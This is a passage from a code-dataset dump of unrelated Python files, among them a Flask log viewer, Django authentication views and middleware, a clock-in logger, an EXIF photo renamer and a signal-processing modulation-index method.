b\"load\")\n","sub_path":"canopen/node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":2584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"541157851","text":"from flask import render_template, request, jsonify, abort\nimport logging\nimport json\nimport os\nimport re\nfrom datetime import datetime, date\n\nfrom app import app\nfrom loggers import request_file_hendler\nfrom config import base_dir\n\n\ndef get_file_name(log_name):\n\t\"\"\"Return name of the file from app config error.log/request.log\"\"\"\n\tif log_name == 'errors':\n\t\treturn app.config['ERROR_LOG_FILE']\n\telse:\n\t\treturn app.config['REQUEST_LOG_FILE']\n\ndef get_error_name(stacktrace):\n\t\"\"\"Parse the stacktrace of error and return name of Error\"\"\"\n\tlines = stacktrace.split('\\n')\n\tlast_line = lines[len(lines) - 2]\n\tresult = re.search(r'^(\\w+Error)', last_line);\n\treturn result.group(0)\n\ndef get_list_of_errors(full_log, **kvargs):\n\t\"\"\"Return list of errors from 
error.log.\n\n\tKeyword arguments:\n\tfull_log -- string line containing full error.log\n\t**kvargs {\n\t\terrors_type -- list of errors which user enter in front (default \"\" i.e. All)\n\t\tdate -- datetime(%Y-%m-%d) date which user enter in front \n\t\t\t\t(in start date=\"\" i.e. All date, if user didn't enter date,\n\t\t\t\t date=today datetime(%Y-%m-%d))\n\t}\n\n\t\"\"\"\n\tfull_log += \"##\"\n\tsearch_result = re.findall(\n\t\tr'(\\d{2}\\:\\d{2}\\:\\d{2} \\d{2}\\/\\d{2}\\/\\d{4}) \\- (.*?)(Traceback .*?)##',\n\t\tfull_log, re.S)\n\t# For all type of errors create a list of dictionaries \n\t# with information about error.\n\tif not kvargs['errors_type']:\n\t\terrors = [{\"datetime\": datetime.strptime(line[0], '%H:%M:%S %d/%m/%Y'), \n\t\t\t\t\t\"msg\": line[1], \n\t\t\t\t\t\"stacktrace\": line[2],\n\t\t\t\t\t\"error_name\": get_error_name(line[2])} for line in search_result] \n\t# Add a filter if error_name != errors_type, this error not add to result.\n\telse:\n\t\terrors = filter(lambda error: error[\"error_name\"] in kvargs['errors_type'],\n\t\t\t\t\t [{\"datetime\": datetime.strptime(line[0], '%H:%M:%S %d/%m/%Y'), \n\t\t\t\t\t \"msg\": line[1], \n\t\t\t\t\t \"stacktrace\": line[2],\n\t\t\t\t\t \"error_name\": get_error_name(line[2])} for line in search_result])\n\t# Add a filter if error datetime != kvargs['date'], this error not add to result.\n\tif kvargs['date']:\n\t\terrors = filter(lambda error: \n\t\t\terror[\"datetime\"].strftime('%d %m %Y') == kvargs['date'].strftime('%d %m %Y'),\n\t\t\terrors)\n\n\t# Sorting result list by date (early -> late).\n\terrors.sort(key = lambda i: i[\"datetime\"], reverse=True)\n\treturn errors\n\ndef get_list_of_request(full_log, **kvargs):\n\t\"\"\"Return list of request from request.log.\n\n\tKeyword arguments:\n\tfull_log -- string line containing full error.log\n\t**kvargs {\n\t\tip -- string ip adress which interested by user (default \"\" i.e. All)\n\t\trequest_date -- datetime(%Y-%m-%d) date which user enter \n\t\t\t\t\t\tin front (default \"\" i.e. All)\n\t\tsn -- string number of counter which interested \n\t\t\t by user (default \"\" i.e. All)\n\t\tstart_date -- datetime(%Y-%m-%d) date which user \n\t\t\t\t\t enter in front (default \"\" i.e. 
All)\n\t}\n\tIf any of kvargs == \"\" filter of this mark will not work.\n\n\t\"\"\"\n\tfull_log += \"##\"\n\tsearch_result = re.findall(\n\t\tr'(\\d{2}\\:\\d{2}\\:\\d{2} \\d{2}\\/\\d{2}\\/\\d{4}) \\- (\\d+\\.\\d+\\.\\d+\\.\\d+)\\n(.*?)\\n##', \n\t\tfull_log, re.S)\n\t# Create a list of dictionaries with information \n\t# about request(date, ip, counter info).\n\trequests = [{\"datetime\": datetime.strptime(line[0], '%H:%M:%S %d/%m/%Y'), \n\t\t\t\t\t\"ip\": line[1],\n\t\t\t\t\t\"request_body\": json.loads(line[2])} for line in search_result] \n\n\t# Translate readout_dt \"1465193586\" --> \"2016-06-06\" in all measurments.\t\t\t\t\t\n\tfor request in requests:\n\t\tfor counter in request.get(\"request_body\").get(\"data\"):\n\t\t\tcounter[\"readout_dt\"] = (date.fromtimestamp(int(counter[\"readout_dt\"])))\n\n\t# Add a filter if request ip != kvargs[\"ip\"], this request not add to result.\n\tif kvargs[\"ip\"]:\n\t\trequests = filter(lambda request: request[\"ip\"] == kvargs[\"ip\"], requests)\n\n\t# Add a filter if request[\"datetime\"] != kvargs['request_date'], this error not add to result.\t\n\tif kvargs['request_date']:\n\t\trequests = filter(lambda request: \n\t\t\trequest[\"datetime\"].strftime('%d %m %Y') == kvargs['request_date'].strftime('%d %m %Y'), \n\t\t\trequests)\n\n\t# Add a filter if sn of counter != kvargs[\"sn\"], this request not add to result.\n\tif kvargs['sn']:\n\t\trequests = filter(lambda request: \n\t\t\trequest.get(\"request_body\").get(\"sn\") == kvargs['sn'], requests)\n\n\t# Add a filter if measurment date \"readout_dt\" < kvargs['start_date'], \n\t# this measurment not add to result.\n\tif kvargs['start_date']:\n\t\tfor request in requests:\n\t\t\trequest.get(\"request_body\")[\"data\"] = filter(\n\t\t\t\tlambda item: item[\"readout_dt\"] >= datetime.date(kvargs['start_date']), \n\t\t\t\trequest.get(\"request_body\")[\"data\"])\n\n\t\trequests = filter(lambda request: \n\t\t\tlen(request.get(\"request_body\").get(\"data\")) >= 1, requests)\n\n\t# Sorting result list by date (early -> late).\n\trequests.sort(key = lambda i: i[\"datetime\"], reverse = True)\t\n\treturn requests\n\n@app.route('/')\ndef index():\n\t\"\"\"Render index page\"\"\"\n\treturn render_template('index.html')\n\n@app.route('/datareceiver', methods=['GET','POST'])\ndef datareceiver():\n\t\"\"\"Get data in JSON format from client and add information\n\tabout requset in request.log. Return status: OK if success.\n\n\t\"\"\"\n\tif request.method == 'GET':\n\t\treturn abort(404)\n\tlogger = logging.getLogger('app.views')\n\tlogger.setLevel(logging.INFO)\n\n\tlogger.addHandler(request_file_hendler)\n\tdata = request.get_json()\n\tlogger.info('{}\\n{}'.format(request.remote_addr, \n\t\t\t\t\t\t\t\tjson.dumps(data, encoding=\"ascii\"))) \n\treturn jsonify({'status' : 'OK'}), 200\n\n@app.route('/getlog', methods=['GET','POST'])\ndef getlog():\n\t\"\"\"Return to client render_template of error_log or request_log\n\t1. Get from client what type of log he want's to see (errors or requests).\n\t2. Get list of dictionaries from get_list_of_errors or get_list_of_requset\n\twith emty named arguments.\n\t3. Return to a client html page with content of errors or requests log.\n\n\t\"\"\"\n\tif request.method == 'GET':\n\t\treturn abort(404)\n\t\n\tfilename = get_file_name(request.get_json())\n\twith open(os.path.join(base_dir, filename)) as fd:\n\t\tfull_log = fd.read()\n\n\tif not full_log:\n\t\treturn jsonify({'log':'
', 'control': ''}), 200\n\n\tif filename == app.config['ERROR_LOG_FILE']:\n\t\t# Get list of errors.\n\t\terrors_list = get_list_of_errors(full_log, \n\t\t\t\t\t\t\t\t\t\t errors_type='', \n\t\t\t\t\t\t\t\t\t\t date='')\n\n\t\t# Get list of type of errors in errors.log.\n\t\terror_name_list = list(set([error['error_name'] for error in errors_list]))\n\n\t\treturn jsonify({'log':render_template('errorlog.html', errors=errors_list), \n\t\t\t\t\t\t'control': render_template('error_log_controle.html', \n\t\t\t\t\t\t\t\t\t\t\t\t   error_name_list=error_name_list)})\n\telse:\n\t\t# Get list of requests.\n\t\trequest_list = get_list_of_request(full_log, \n\t\t\t                               ip=\"\", \n\t\t\t                               request_date=\"\", \n\t\t\t                               sn=\"\", \n\t\t\t                               start_date=\"\")\n\t\treturn jsonify({'log':render_template('requestlog.html', \n\t\t\t\t\t\t\t\t\t\t\t   requests=request_list), \n\t\t\t\t\t\t'control': ''})\n\n@app.route('/errorlogfilter', methods=['GET','POST'])\ndef errorlogfilter():\n\t\"\"\"Return to client render_template of error_log with user filters:\n\tMethod get JSON: {\n\t\t\"errors\" : string errors separeted by ' ' or empty string (i.e. all type)\n\t\t\"date\" : string (yyyy-mm-dd) choice by user(for filter)\n\t}\n\n\t\"\"\"\n\tif request.method == 'GET':\n\t\treturn abort(404)\n\telse:\n\t\tdata = request.get_json()\n\t\tif data[\"errors\"]:\n\t\t\terrors = data[\"errors\"].split()\n\t\telse:\n\t\t\terrors = data[\"errors\"]\n\n\t\tdate = get_date(data[\"date\"])\n\n\t\twith open(os.path.join(base_dir, app.config['ERROR_LOG_FILE'])) as fd:\n\t\t\tfull_log = fd.read()\n\t\t# If log is empty return empty response.\n\t\tif not full_log:\n\t\t\treturn jsonify({'log':'
'}), 200\n\t\t# Get filtered errosr_list.\n\t\terrors_list = get_list_of_errors(full_log, errors_type=errors, date=date)\n\t\terror_name_list = list(set([error['error_name'] for error in errors_list]))\t\n\n\treturn jsonify({'log':render_template('errorlog.html', errors=errors_list), \n\t\t\t\t\t'control': render_template('error_log_controle.html', \n\t\t\t\t\t\t\t\t\t\t\t   error_name_list=error_name_list)})\n\ndef get_date(date):\n\t\"\"\"Translation string date -> datetime date or return empty string\"\"\"\n\tif date:\n\t\treturn datetime.strptime(date, '%Y-%m-%d')\n\treturn date\n\n@app.route('/requestlogfilter', methods=['GET','POST'])\ndef requestlogfilter():\n\t\"\"\"Return to client render_template of request_log with user filters:\n\tMethod get JSON: {\n\t\t\"ip\" : string ip choice by user(for filter)\n\t\t\t   or empty string (i.e. all ips)\n\t\t\"request_date\" : string (yyyy-mm-dd) request date choice \n\t\t\t\t\t\t by user(for filter) or empty string \n\t\t\t\t\t\t (i.e. all date)\n\t\t\"sn\" : string counter number choice by user(for filter)\n\t\t\t   or empty string (i.e. all sns)\n\t\t\"start_date\" : string (yyyy-mm-dd) request date choice \n\t\t\t\t\t   by user(for filter) later that date \n\t\t\t\t\t   measurment add in result or empty string \n\t\t\t\t\t   (i.e. all date)\n\t}\n\n\t\"\"\"\n\tif request.method == 'GET':\n\t\treturn abort(404)\n\t\n\tdata = request.get_json()\n\trequest_date = get_date(data[\"request_date\"])\n\tstart_date = get_date(data[\"start_date\"])\n\n\twith open(os.path.join(base_dir, \n\t\t\t\t\t\t   app.config['REQUEST_LOG_FILE'])) as fd:\n\t\tfull_log = fd.read()\n\t# If log is empty return empty response.\n\tif not full_log:\n\t\treturn jsonify({'log':'
'}), 200\n\t# Get filtered request_list.\n\trequest_list = get_list_of_request(full_log, \n\t\t\t\t\t\t\t\t\t   ip=data[\"ip\"], \n\t\t\t\t\t\t\t\t\t   request_date=request_date, \n\t\t\t\t\t\t\t\t\t   sn=data[\"sn\"], \n\t\t\t\t\t\t\t\t\t   start_date=start_date) \n\n\treturn jsonify({'log':render_template('requestlog.html', \n\t\t\t\t\t\t\t\t\t\t  requests=request_list)})","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"494035896","text":"import json\n\nfrom django.conf import settings\nfrom django.contrib import auth\nfrom django.contrib.auth.models import AnonymousUser, User\nfrom homados.contrib.cache import ConfigCache\nfrom homados.contrib.exceptions import MissParamError\nfrom homados.contrib.mymixins import PackResponseMixin\nfrom libs.utils import get_user_ident, report_auth_event\nfrom rest_framework import exceptions, filters, status, viewsets\nfrom rest_framework.decorators import action\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\n\nfrom .models import Log\nfrom .serializers import LogSerializer, UserRegisterSerializer, UserSerializer\n\n# platform runtime configuration\nruntime_config = ConfigCache()\n\n\nclass AuthViewSet(PackResponseMixin, viewsets.ModelViewSet):\n    \"\"\"auth viewset\"\"\"\n    queryset = User.objects.all()\n    serializer_class = UserSerializer\n    permission_classes = [IsAuthenticated]\n\n    @action(methods=[\"POST\"], detail=False, url_path=\"register\", permission_classes=[])\n    def register(self, request, *args, **kwargs):\n        if runtime_config.get('close_register'):\n            raise exceptions.ValidationError(detail={'detail': '该平台已关闭注册'})\n        serializer = UserRegisterSerializer(data=request.data)\n        serializer.is_valid(raise_exception=True)\n        user = serializer.save()\n        report_auth_event(f\"{get_user_ident(user)} 注册成功\")\n        return Response(serializer.data, status=status.HTTP_201_CREATED)\n\n    @action(methods=[\"POST\"], detail=False, url_path=\"login\", permission_classes=[])\n    def login(self, request, *args, **kwargs):\n        serializer = self.get_serializer(data=request.data)\n        user = auth.authenticate(request, username=serializer.initial_data[\"username\"], password=serializer.initial_data[\"password\"])\n        if not user:\n            raise exceptions.PermissionDenied(detail='账号或密码错误')\n        auth.login(request, user)\n        serializer = self.get_serializer(user)\n        report_auth_event(f\"{get_user_ident(user)} 登录平台\")\n        return Response({**serializer.data, 'token': request.session.session_key})\n\n    @action(methods=[\"DELETE\"], detail=False, url_path=\"logout\")\n    def logout(self, request, *args, **kwargs):\n        auth.logout(request)\n        report_auth_event(f\"{get_user_ident(request.user)} 登出平台\")\n        return Response('登出平台成功')\n\n    @action(methods=[\"GET\"], detail=False, url_path=\"info\")\n    def info(self, request, *args, **kwargs):\n        data = {}\n        data['roles'] = ['admin'] if request.user.is_staff else ['user']\n        serializer = self.get_serializer(request.user)\n        report_auth_event(f\"{get_user_ident(request.user)} 进入平台\")\n        data['close_register'] = runtime_config.get('close_register', False)\n        data.update(serializer.data)\n        return Response(data)\n\n    def list(self, request):\n        queryset = User.objects.all()\n        serializer = UserSerializer(queryset, many=True)\n        return Response(serializer.data)\n\n    def destroy(self, request, *args, **kwargs):\n        instance = self.get_object()\n        self.perform_destroy(instance)\n        return Response(data={'detail': f'{instance.username} 删除成功'})\n\n    def update(self, request, *args, **kwargs):\n        try:\n            user = User.objects.get(username=self.get_object())\n            if(request.data['password']==request.data['confirm_password']):\n                user.set_password(request.data.get('password'))\n                user.save()\n                return Response({'detail': '修改密码成功'})\n            else:\n                return Response({'detail': 'The two password inputs are not the same'})\n        except KeyError as e:\n            raise MissParamError(query_params=[str(e)])\n\n\n    @action(methods=[\"PATCH\"], detail=False, url_path=\"switchRegister\")\n    def switch_register(self, request, *args, **kwargs):\n        try:\n            is_close_register = bool(request.data['close'])\n            runtime_config.set('close_register', is_close_register, None)\n            msg = '关闭' if is_close_register else '打开'\n            report_auth_event(f\"{get_user_ident(request.user)} {msg}注册\")\n            return Response({'detail': '设置成功'})\n        except KeyError as e:\n            raise MissParamError(query_params=['close'])\n\n\nclass LogViewSet(PackResponseMixin, viewsets.ReadOnlyModelViewSet):\n    queryset = Log.objects.all()\n    serializer_class = LogSerializer\n    permission_classes = [IsAuthenticated]\n    filter_backends = [filters.SearchFilter, filters.OrderingFilter]\n    search_fields = ['info', 'ltype']\n","sub_path":"homados/apps/userauth/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"113599796","text":"#!/usr/bin/python\n\n# Script to keep track of the time I spend telecommuting.\nimport os\nimport time\n\n# Change to the clock_in log directory.\nos.chdir('LOG_DIR')\n\n# Get the local time.\nlocal_time = time.localtime()\n\n# Determine the log file name and open it.\norig_day = '{}-{:02}-{:02}'.format(local_time.tm_year,local_time.tm_mon,local_time.tm_mday)\nlog_file = open(orig_day + '.log','a')\n\n# Function to log the given message to the current log file.\ndef log_message(message):\n\tglobal log_file, orig_day\n\n\t# Get the local time.\n\tlocal_time = time.localtime()\n\t# Make sure it is the same day as the day that the script was started.\n\ttoday = '{}-{:02}-{:02}'.format(local_time.tm_year,local_time.tm_mon,local_time.tm_mday)\n\tif today != orig_day:\n\t\tlog_file.write('Continued on '+today+'\\n')\n\t\tlog_file.close()\n\t\tlog_file = open(today + '.log','w')\n\t\tlog_file.write('Continued from '+orig_day)\n\t\torig_day = today\n\n\t# Determine the log prefix.\n\tlog_prefix = '{:02}:{:02}:{:02}| '.format(local_time.tm_hour,local_time.tm_min,local_time.tm_sec)\n\n\t# Write to the log file.\n\tlog_file.write(log_prefix+message+'\\n')\n\n# Clock in.\nlog_message('Clocking in')\n\n# Determine the prompt string.\nprompt_string = '> '\n\n# Continuously collect user input.\ntry:\n\twhile True:\n\t\t# Prompt the user for an entry.\n\t\tline = raw_input(prompt_string)\n\n\t\tif line.lower() == 'clock out':\n\t\t\tlog_message('Clocking out\\n')\n\t\t\tbreak\n\n\t\tlog_message(line)\n\t\nexcept EOFError:\n\tlog_message('Clocking out\\n')\n\t# Exit on EOF.\n\tprint\n\nlog_file.close()\n","sub_path":"clock_in.py","file_name":"clock_in.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"132387815","text":"import os\nimport json\n\nfrom sensoragent.exceptions.errors import  *\n\nclass Config:\n\n    def __init__(self):\n        try:\n            self.config_file = os.environ['BAR_CONFIG']\n            self.map_data = None\n            self.targets = None\n        except(KeyError):\n            raise VariableMissingError(\"Variable BAR_CONFIG missing\")\n\n    def load_resources(self):\n        if not os.path.isfile(self.config_file):\n            raise InvalidConfigFileError(\"Invalid config file\")\n        self.map_data = json.load(open(self.config_file))\n\n    def get_target(self):\n        if self.map_data == None:\n            raise InvalidStateError(\"Resources should be load before. Use load_resources method before running it.\")\n        \n        return self.map_data['target']\n\n    def get_aggregate(self):\n        if self.map_data == None:\n            raise InvalidStateError(\"Resources should be load before. Use load_resources method before running it.\")\n\n        return self.map_data['aggregate']\n","sub_path":"agents/SensorAgent/sensoragent/utils/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"166346324","text":"#!/usr/bin/env python\n# tag-exif.py\nimport os, sys, time\nfrom exif import Image\n\ndef tagExif(parentFolder):\n  for dirName, subdirs, fileList in os.walk(parentFolder):\n    for filename in fileList:\n\n      if ((len(filename)>1) and (filename[0:2]=='x_')):\n        print(\"SKIPPING %s\" %filename)\n        continue\n\n      sp =filename.split('.')\n      if (len(sp) < 2):\n        print(\"NO EXT for %s\" %filename)\n        continue\n\n      ext = sp[-1].lower()\n      if not (ext in ['jpg']):\n        print(\"SKIP EXT %s for %s\" % (ext, filename))\n        continue\n\n      path = os.path.join(dirName, filename)\n      with open(path, 'rb') as image_file:\n        my_image = Image(image_file)\n\n      if (hasattr(my_image, 'has_exif') and my_image.has_exif and hasattr(my_image, 'datetime')):\n        dt = my_image.datetime.replace(':','-').replace(' ', '_T')\n      else:\n        dt = '0000-00-00_T00-00-00'\n\n      # initialize and strip unwanted characters\n      new_filename = filename.replace('=','-').replace(\"'\", '').replace('#', '').replace('&','').replace(',', '_').replace(' ', '_')\n      # consolidate multiple underscores to single underscore\n      new_filename = 'x_' + dt + ' ' +'_'.join(filter(None,new_filename.split('_')))\n      print(new_filename)\n      new_path = os.path.join(dirName, new_filename)\n      os.rename(path, new_path)\n\n  return\n\nif __name__ == '__main__':\n    if len(sys.argv) > 1:\n        folders = sys.argv[1:]\n        for i in folders:\n            # Iterate the folders given\n            if os.path.exists(i):\n                # Find the duplicated files and append them to the dups\n                tagExif(i)\n            else:\n                print('%s is not a valid path, please verify' % i)\n                sys.exit()\n    else:\n        print('Usage: python exif-tag.py folder or python exif-tag.py folder1 folder2 folder3')","sub_path":"exif-tag.py","file_name":"exif-tag.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"196958337","text":"import numpy as np\n\ndef fun_dAX(X, Xu1, Xd1, Xd2, Xleft1, hX, eyeD, eyeDleft2, eyeDleft1, eyeDright1, D, dim_obs, M, Y, dt, Rm, Rf, scaling):\n\n    # GX: Jacobian-like coupling term of the discretized dynamics, assembled\n    # from shifted copies of the state and shifted identity masks\n    GXterm1 = np.multiply(eyeDleft1[:,:,None], np.transpose(Xu1[:,:,None] - Xd2[:,:,None],(0,2,1)))\n    GXterm2 = np.multiply(eyeDright1[:,:,None] - eyeDleft2[:,:,None], np.transpose(Xd1[:,:,None], (0,2,1)))\n    GX = GXterm1 + GXterm2 - eyeD[:,:,None]\n\n    # model-error gradient from the difference with the previous time step;\n    # the first time index has no predecessor, so its column is zeroed\n    kern2 = np.multiply(np.transpose(X[:,:,None] - np.roll(hX, 1, 1)[:,:,None], (0, 2, 1)), eyeD[:,:,None] - dt/2*GX)\n    kern2 = Rf/M*np.transpose(np.sum(kern2,0)[None,:,:], (1,2,0))[:,:,0]\n    kern2[:,0] = 0\n\n    # model-error gradient from the difference with the next time step;\n    # the last time index has no successor, so its column is zeroed\n    kern3 = np.multiply(np.transpose(Xleft1[:,:,None]-hX[:,:,None], (0,2,1)), eyeD[:,:,None] + dt/2*GX)\n    kern3 = -Rf/M*np.transpose(np.sum(kern3,0)[None,:,:], (1,2,0))[:,:,0]\n    kern3[:,-1] = 0\n\n    # measurement-error gradient, applied only to the observed dimensions\n    kern1 = np.zeros(shape=(D,M))\n    kern1[dim_obs,:] = Rm/M*(X[dim_obs,:] - Y)\n\n    # total gradient of the action with respect to X\n    dAX = scaling * (kern1 + kern2 + kern3)\n\n    return dAX","sub_path":"fun_dAX.py","file_name":"fun_dAX.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"412616795","text":"from django.shortcuts import redirect\nfrom django.urls import reverse\n\n\nclass UserPermissionMiddleware:\n\n    def __init__(self, get_response):\n        self.get_response = get_response\n\n    def __call__(self, request):\n        response = self.get_response(request)\n        return response\n\n    def process_view(self, request, *args):\n        try:\n            pk = args[2]['pk']\n        except:\n            pk = 1\n        urls = (\n            reverse('logout'),\n            reverse('animal_list'),\n            reverse('animal_detail', kwargs={'pk': pk}),\n            reverse('add_animal'),\n            reverse('edit_animal', kwargs={'pk': pk}),\n            reverse('med_list', kwargs={'pk': pk}),\n            reverse('api_med'),\n            reverse('med_detail', kwargs={'pk': pk}),\n            reverse('med_add'),\n        )\n\n        volunteer_urls = urls[:2]\n        employee_urls = urls[:4]\n        manager_urls = urls[:4]\n        director_urls = urls[:6]\n        vet_urls = urls[:]\n        admin_urls = urls[:]\n\n        user_perms = {\n            'volunteer': volunteer_urls,\n            'employee': employee_urls,\n            'manager': manager_urls,\n            'director': director_urls,\n            'vet': vet_urls,\n            'admin': admin_urls,\n        }\n\n        try:\n            latitude = args[2]['latitude']\n            longtitude = args[2]['longtitude']\n        except:\n            longtitude = None\n            latitude = None\n\n        free_access_urls = (\n            reverse('api_comments'),\n            reverse('api_animals'),\n            reverse('api_animals2', kwargs={'latitude': latitude, 'longtitude': longtitude}),\n            reverse('login'),\n            '/admin/',\n        )\n\n        if request.path in free_access_urls:\n            return None\n        else:\n            if request.user.is_authenticated:\n                try:\n                    if request.path not in user_perms[request.user.position]:\n                        return redirect('animal_list')\n                    else:\n                        return None\n                except:\n                    return redirect('animal_list')\n            else:\n                return redirect('login')\n","sub_path":"animals/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"2259681","text":"# -*- coding: utf-8 -*-\n# Copyright (c) St. Anne's University Hospital in Brno. International Clinical\n# Research Center, Biomedical Engineering. All Rights Reserved.\n# Distributed under the (new) BSD License. See LICENSE.txt for more info.\n\n# Std imports\n\n# Third party imports\nimport numpy as np\nimport scipy.signal as sp\n\n# Local imports\nfrom ..utils.method import Method\n\n\ndef compute_mi_count(data, nbins=18):\n    \"\"\"\n    Function to compute modulation index (MI) of given data\n\n    Parameters\n    ----------\n    data: numpy.ndarray\n        data from which MI is computed\n    nbins: int\n        number of bins in which data will be separated, can affect the result, default is 18\n\n    Returns\n    -------\n    MI: float64\n        modulation index computed as KL/np.log(nbins)\n\n    Example\n    -------\n    MI = compute_mi_count(data)\n\n    \"\"\"\n\n    size = 2 * np.pi / nbins\n    position = np.zeros(nbins)\n    mean_amp = np.zeros(nbins)\n\n    # Binning the phases\n    for bins in range(0, nbins):\n        position[bins] = -np.pi + bins * size\n\n    f_data = sp.hilbert(data)\n    ampl = np.abs(f_data)\n    ph = np.angle(f_data)\n\n    # Computing average amplitude\n    for j in range(0, nbins):\n        phases1 = ampl[np.where(position[j] <= ph)]\n        phases2 = ampl[np.where(ph < position[j] + size)]\n        phases = np.intersect1d(phases1, phases2)\n        mean_amp[j] = np.mean(phases)\n\n    # Normalizing amplitude\n    p = mean_amp / np.sum(mean_amp)\n\n    # Computing Shannon entropy\n    H = -np.sum(p * np.log(p))\n\n    # Computing Kullback–Leibler distance\n    KL = np.log(nbins) - H\n\n    return KL / np.log(nbins)\n\n\nclass ModulationIndex(Method):\n\n    algorithm = 'MODULATION_INDEX'\n    algorithm_type = 'univariate'\n    version = '1.0.0'\n    dtype = [('mi', 'float32')]\n\n    def __init__(self, **kwargs):\n        \"\"\"\n        Modulation Index\n\n        Parameters\n        ----------\n        data: numpy.ndarray\n            data from which MI is computed\n        nbins: int\n            number of bins in which data will be separated, can affect the result, default is 18\n        \"\"\"\n\n        super().__init__(compute_mi_count, **kwargs)\n","sub_path":"epycom/univariate/modulation_index.py","file_name":"modulation_index.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"611463022","text":"#!/usr/bin/python\ndef f1(x, y=0):\n    wynik = x*x+y\n    return wynik\n\ndef f2(x):\n    if len(x)==0:  \n        return 'BUUUUM'\n    else:        \n        return x[0]\n\ndef f3(x):        \n    return {\n        1: \"jeden\",\n        2: \"dwa\",\n        3: \"trzy\",\n        }.get(x,'other')\n\ndef f4(x, y=''):\n    mk=' ma kota'\n    i = ''\n    if y!='':\n        i = ' i ' + y\n    return x + mk + i \n    \n    ","sub_path":"adam/wroc.py","file_name":"wroc.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"279876394","text":"from core.helpers import try_convert\nfrom core.logger import Logger\n\nfrom plex.objects.library.metadata.episode import Episode\nfrom plex.objects.library.metadata.movie import Movie\nfrom plex.objects.library.metadata.show import Show\nfrom plex_metadata import Guid, Matcher\n\nlog = Logger('core.action')\n\n\nclass PlexHelper(object):\n    @staticmethod\n    def get_root(p_item):\n        if isinstance(p_item, Episode):\n            return p_item.show\n\n        return p_item\n\n    @classmethod\n    def to_trakt(cls, key, p_item, guid=None, year=None, strict=True):\n        data = {}\n\n        if type(p_item) is Episode:\n            data['number'] = key\n\n        if type(p_item) is Movie or type(p_item) is Show:\n            p_root = cls.get_root(p_item)\n\n            data['title'] = p_root.title\n\n            if year:\n                data['year'] = year\n            elif p_root.year is not None:\n                data['year'] = p_root.year\n            elif p_item.year is not None:\n                data['year'] = p_item.year\n\n            # Set identifier on movie/show objects\n            return ActionHelper.set_identifier(data, guid or p_root.guid, strict=strict)\n\n        return data\n\n\nclass TraktHelper(object):\n    @classmethod\n    def episodes(cls, episodes):\n        result = []\n\n        for episode in episodes:\n            _, episodes = Matcher.process(episode)\n\n            for episode_num in episodes:\n                result.append({\n                    'number': episode_num\n                })\n\n        return result\n\n\nclass ActionHelper(object):\n    plex = PlexHelper\n    trakt = TraktHelper\n\n    @classmethod\n    def set_identifier(cls, data, guid, strict=True):\n        if not guid:\n            return None\n\n        if type(guid) is str:\n            # Parse raw guid\n            guid = Guid.parse(guid)\n\n        if 'ids' not in data:\n            data['ids'] = {}\n\n        ids = data['ids']\n\n        if guid.agent == 'imdb':\n            ids['imdb'] = guid.sid\n        elif guid.agent == 'tmdb':\n            ids['tmdb'] = try_convert(guid.sid, int)\n        elif guid.agent == 'tvdb':\n            ids['tvdb'] = try_convert(guid.sid, int)\n        elif not strict:\n            log.info('Unknown Guid agent: \"%s\"', guid.agent)\n        else:\n            log.info('Unknown Guid agent: \"%s\" [strict]', guid.agent)\n            return None\n\n        return data\n","sub_path":"Trakttv.bundle/Contents/Code/core/action.py","file_name":"action.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"175910197","text":"from nltk.tokenize import word_tokenize as wt\nfrom nltk import pos_tag, RegexpParser\nfrom feature_extraction.linguistic.utils import reshape_vector, reshape_matrix\n\ndef phrase_freq(tags, parser, shape):\n    phrases = []\n    for tagged in tags:\n        chunks = parser.parse(tagged)\n        for sub in chunks.subtrees(filter=lambda t: t.label() == 'PHRASES'):\n            phrases.append(' '.join([i[0] for i in sub]))\n    freq = [phrases.count(p) / len(phrases) for p in phrases]\n    return reshape_matrix(freq, shape, shape)\n\ndef get_syntactic_features(sentences, shape):\n    tags = [pos_tag(words) for words in [wt(sent) for sent in sentences]]\n    parser = RegexpParser('''\n                        PHRASES: {
